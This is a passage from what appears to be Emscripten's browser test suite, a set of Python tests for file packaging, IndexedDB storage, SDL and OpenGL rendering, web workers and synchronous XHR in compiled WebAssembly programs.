subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-sLZ4=1', '-sFORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-sCLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
create_file('files.js', out, binary=True)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-sFORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-sASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-sINITIAL_MEMORY=80MB', '-sASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-sFULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sUSE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-sINLINING_LIMIT', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-sLEGACY_GL_EMULATION', '-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-sUSE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-sUSE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
create_file('main.html', '''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
def test_mmap_lazyfile(self):
create_file('lazydata.dat', 'hello world')
create_file('pre.js', '''
Module["preInit"] = () => {
FS.createLazyFile('/', "lazy.txt", "lazydata.dat", true, false);
}
''')
self.emcc_args += ['--pre-js=pre.js', '--proxy-to-worker']
self.btest_exit(test_file('test_mmap_lazyfile.c'))
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
create_file(main, r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
create_file('worker_prejs.js', r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file('checksummer.c'), '-g', '-sSMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', 'worker_prejs.js'])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-sUSE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
# Enabling FULL_ES3 also enables ES2 automatically
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-sGL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-sFULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-sGL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-sFULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('third_party/glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('third_party/glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-sFULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-sFULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('third_party/glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('third_party/glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('third_party/glbook/CH02_HelloTriangle.png')),
# (Path('third_party/glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('third_party/glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('third_party/glbook/CH09_TextureWrap.png')),
# (Path('third_party/glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('third_party/glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('third_party/glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('third_party/glbook/CH09_SimpleTexture2D.png')),
(Path('third_party/glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('third_party/glbook/CH10_MultiTexture.png')),
(Path('third_party/glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('third_party/glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('third_party/glbook/Common'),
test_file('third_party/glbook/Common/esUtil.c'),
test_file('third_party/glbook/Common/esShader.c'),
test_file('third_party/glbook/Common/esShapes.c'),
test_file('third_party/glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-sFULL_ES3=1', '-sUSE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-sEXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-sEXPORTED_FUNCTIONS=_main,_set', '-sFORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sEXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@parameterized({
'': ([],),
# test pthreads + AUTO_JS_LIBRARIES mode as well
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sAUTO_JS_LIBRARIES=0'],),
})
@requires_threads
def test_emscripten_main_loop_settimeout(self, args):
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
})
@requires_threads
def test_emscripten_main_loop_and_blocker(self, args):
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@parameterized({
'': ([],),
'worker': (['--proxy-to-worker'],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],)
})
@requires_threads
def test_emscripten_main_loop_setimmediate(self, args):
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@parameterized({
'': ([],),
'pthreads': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sOFFSCREEN_FRAMEBUFFER'],),
})
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self, args):
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-sGL_UNSAFE_OPTS=0', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-sGL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sUSE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL', '-sRELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre2.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sGL_DEBUG', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_pre3.c'), reference=Path('third_party/cubegeom', 'cubegeom_pre2.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(Path('third_party/cubegeom', 'cubegeom.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-sUSE_PTHREADS', '-sUSE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(Path('third_party/cubegeom', 'cubegeom_proc.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_glew.c'), reference=Path('third_party/cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-sLEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_color.c'), reference=Path('third_party/cubegeom', 'cubegeom_color.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(Path('third_party/cubegeom', 'cubegeom_normal.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(Path('third_party/cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=Path('third_party/cubegeom', 'cubegeom_normal.png'), args=['-sLEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
